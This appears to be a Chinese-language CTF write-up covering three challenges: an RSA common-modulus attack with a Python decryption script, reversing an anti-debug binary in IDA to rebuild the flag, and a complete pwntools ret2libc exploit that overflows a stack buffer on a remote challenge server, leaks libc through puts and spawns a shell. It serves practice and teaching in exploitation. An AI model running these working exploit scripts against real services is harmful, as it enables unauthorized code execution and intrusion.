一、RSA
题目给出flag1.enc、flag2.enc、pubkey1.pem、pubkey1.pem四个文件
使用以下指令提取pem文件中的n和e
rsa -pubin -text -modulus -in pubkey1.pem
rsa -pubin -text -modulus -in pubkey2.pem
user@ubuntu:~/workspace/RSA$ openssl rsa -pubin -text -modulus -in pubkey1.pem Public-Key: (2048 bit) Modulus: 00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66: 42:17 Exponent: 2333 (0x91d) Modulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217 writing RSA key -----BEGIN PUBLIC KEY----- MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEAiYmjmJiEVrP+9Katht88 mVd/iXgEjeVDa+/DDY2MlJWJEqpSb/MztmhXMG67jeNsLDlqhO/cXTglAtqho/O2 6XUC0uMchJMw9bTJUlehSal/WVTq+JNBFHrc3U6VD/904wu+Yih2tC7qyG30rZcV 0FtWBKqBeUJMfZrEa9a18yKytXKLoUhwSiWo78wefITqflzj4BcD8E+UpDHZlUvX rix91uh5s1+KLUpe++c3JXv5m9nuZrFa/yM/x3tVikh9pZUvviuSPanF60Z4jAUD Nrfjal7YLVwbKusORb7kBcvnJIHbJWiqgp7qyH0gGlqP9e5vC+OBkqsoOWNfbGZC FwICCR0= -----END PUBLIC KEY-----
得到第一个
e:2333
n:0xModulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217
user@ubuntu:~/workspace/RSA$ openssl rsa -pubin -text -modulus -in pubkey2.pem Public-Key: (2048 bit) Modulus: 00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66: 42:17 Exponent: 23333 (0x5b25) Modulus=8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217 writing RSA key -----BEGIN PUBLIC KEY----- MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEAiYmjmJiEVrP+9Katht88 mVd/iXgEjeVDa+/DDY2MlJWJEqpSb/MztmhXMG67jeNsLDlqhO/cXTglAtqho/O2 6XUC0uMchJMw9bTJUlehSal/WVTq+JNBFHrc3U6VD/904wu+Yih2tC7qyG30rZcV 0FtWBKqBeUJMfZrEa9a18yKytXKLoUhwSiWo78wefITqflzj4BcD8E+UpDHZlUvX rix91uh5s1+KLUpe++c3JXv5m9nuZrFa/yM/x3tVikh9pZUvviuSPanF60Z4jAUD Nrfjal7YLVwbKusORb7kBcvnJIHbJWiqgp7qyH0gGlqP9e5vC+OBkqsoOWNfbGZC FwICWyU= -----END PUBLIC KEY-----
得到第二个
e:23333
n:0x8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217
共模攻击代码参考:http://www.freebuf.com/column/148898.html (PS:此题还需对原两个enc文件进行base64解密)
# -*- coding: utf-8 -*- from libnum import n2s,s2n from gmpy2 import invert import base64 # 欧几里得算法 def egcd(a, b): if a == 0: return (b, 0, 1) else: g, y, x = egcd(b % a, a) return (g, x - (b // a) * y, y) def main(): n = 0x8989A398988456B3FEF4A6AD86DF3C99577F8978048DE5436BEFC30D8D8C94958912AA526FF333B66857306EBB8DE36C2C396A84EFDC5D382502DAA1A3F3B6E97502D2E31C849330F5B4C95257A149A97F5954EAF89341147ADCDD4E950FFF74E30BBE622876B42EEAC86DF4AD9715D05B5604AA8179424C7D9AC46BD6B5F322B2B5728BA148704A25A8EFCC1E7C84EA7E5CE3E01703F04F94A431D9954BD7AE2C7DD6E879B35F8A2D4A5EFBE737257BF99BD9EE66B15AFF233FC77B558A487DA5952FBE2B923DA9C5EB46788C050336B7E36A5ED82D5C1B2AEB0E45BEE405CBE72481DB2568AA829EEAC87D201A5A8FF5EE6F0BE38192AB2839635F6C664217 fo1 = open('flag1.enc','rb') fo2 = open('flag2.enc','rb') datafo1 = fo1.read() datafo2 = fo2.read() c1 = s2n(base64.b64decode(datafo1)) c2 = s2n(base64.b64decode(datafo2)) fo1.close() fo2.close() e1 = 2333 e2 = 23333 s = egcd(e1, e2) s1 = s[1] s2 = s[2] # 求模反元素 if s1<0: s1 = - s1 c1 = invert(c1, n) elif s2<0: s2 = - s2 c2 = invert(c2, n) m = pow(c1,s1,n)*pow(c2,s2,n) % n print(n2s(m)) if __name__ == '__main__': main()
得到flag:
flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}
二、Antidbg
IDA打开看到,在字符串窗口中看到pause
转到对应汇编处,F5,positive sp value has been found。
菜单栏 ==> Options ==> General ,把Stack Pointer勾上
参考:https://blog.csdn.net/kendyhj9999/article/details/78175149
在左侧出现负的sp的上一行处,按Alt + K,弹出一个窗口,在当前差异前加一个负号,单击确定。
再次F5
int __usercall sub_4011A0@<eax>(char a1@<sil>) { memset(input, 0, 0x32u); CoInitialize(0); CreateThread(0, 0, StartAddress, 0, 0, 0); sub_401050((const char *)&unk_402128, (unsigned int)input); if ( strlen(input) == 42 ) { i = 0; v3 = xmmword_4021C0; v5 = 34080258; v4 = xmmword_4021B0; v6 = 33882121; v7 = 3330; while ( input[i] >> 4 == dword_403018[a[i]] && (input[i] & 0xF) == dword_402138[*((char *)&v3 + i)] ) { if ( ++i >= 42 ) { v9 = 1667462515; v10 = 7566181; goto LABEL_8; } } LOWORD(v10) = 114; v9 = 1869771365; LABEL_8: sub_401020(&v9, a1); } system("pause"); return 0; }
动态调试后dword_403018数组 402138数组的值:
数组a:
v3:
根据反汇编出来的结果可以知道是通过a数组中的值索引到403018对应的值,这里面是一个字符的高4位,通过数组v3中的值索引到402138对应的值,这里面是一个字符的低4位。(这里刚好402138其对应值个其对应的索引相等,写脚本的时候就用不着把402138也列出来了)
a = [ 0x02 ,0x02 ,0x02 ,0x02 ,0x03 ,0x01 ,0x01 ,0x02 , 0x01 ,0x01 ,0x02 ,0x01 ,0x01, 0x00 ,0x01 ,0x01 , 0x02 ,0x02 ,0x00 ,0x01 ,0x01 ,0x01 ,0x01 ,0x00 , 0x01 ,0x01 ,0x02 ,0x02 ,0x00 ,0x01 ,0x01 ,0x02 , 0x02 ,0x01 ,0x01 ,0x01 ,0x01 ,0x01 ,0x02 ,0x01 , 0x01 ,0x03] v_3018 = [2, 3, 6, 7] v3 = [ 0x06, 0x0C, 0x01, 0x07, 0x0B, 0x00, 0x06, 0x02, 0x01, 0x06, 0x01, 0x07 ,0x02, 0x0D, 0x05, 0x01, 0x03, 0x03, 0x0D, 0x04, 0x03, 0x01, 0x00, 0x0D, 0x08, 0x08, 0x01, 0x02, 0x0D, 0x07, 0x00, 0x01, 0x02, 0x06, 0x08, 0x02, 0x09, 0x00, 0x05, 0x02, 0x02, 0x0d] flag = '' for i in range(42): ch = v_3018[a[i]]<<4 ch = ch | v3[i] flag += chr(ch) print(flag)
得到flag:
flag{06b16a72-51cc-4310-88ab-70ab68290e22}
三、PWN PlainR2B
题目给了一个pwn和一个libc.so
F5
int game() { int result; // eax char buf; // [esp+Ch] [ebp-1Ch] puts("First, what's your name?"); if ( read(0, &name, 0x14u) > 19 ) { puts("Oh, your name too loooooong..."); exit(0); } setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); printf("%s, do you want to get flag? ", &name); read(0, &buf, 0x34u); if ( !strcmp(&buf, "yes") || (result = strcmp(&buf, "YES")) == 0 ) result = printf("OK,the flag is flag{%s}, enmmm... but is true?", "WorkToWeekT_T"); return result; }
可以看到在read(0, &buf, 0x34u);处有栈溢出。
覆盖到puts处泄露libc计算system,返回地址设为game,再次覆盖返回地址,覆盖成system。
from pwn import * #p = process('./pwn') p = remote('117.50.60.184', 12345) elf = ELF('./pwn') libc = ELF('./libc-2.23.so') puts_libc = libc.symbols['puts'] system_libc = libc.symbols['system'] binsh_libc = libc.search('/bin/sh').next() game = elf.symbols['game'] puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] payload = 'A'*0X1C + 'B'*4 + p32(puts_plt) + p32(game) + p32(puts_got) p.recvuntil('name?') p.sendline('haha') p.recvuntil('flag?') p.sendline(payload) p.recv(1) puts_addr = u32(p.recv(4)) system_addr = puts_addr - puts_libc + system_libc binsh_addr = puts_addr - puts_libc + binsh_libc payload1 = 'A'*0x1c + 'B'*4 + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr) p.recvuntil('name?') p.sendline('Brian') p.recvuntil('flag?') p.sendline(payload1) p.interactive()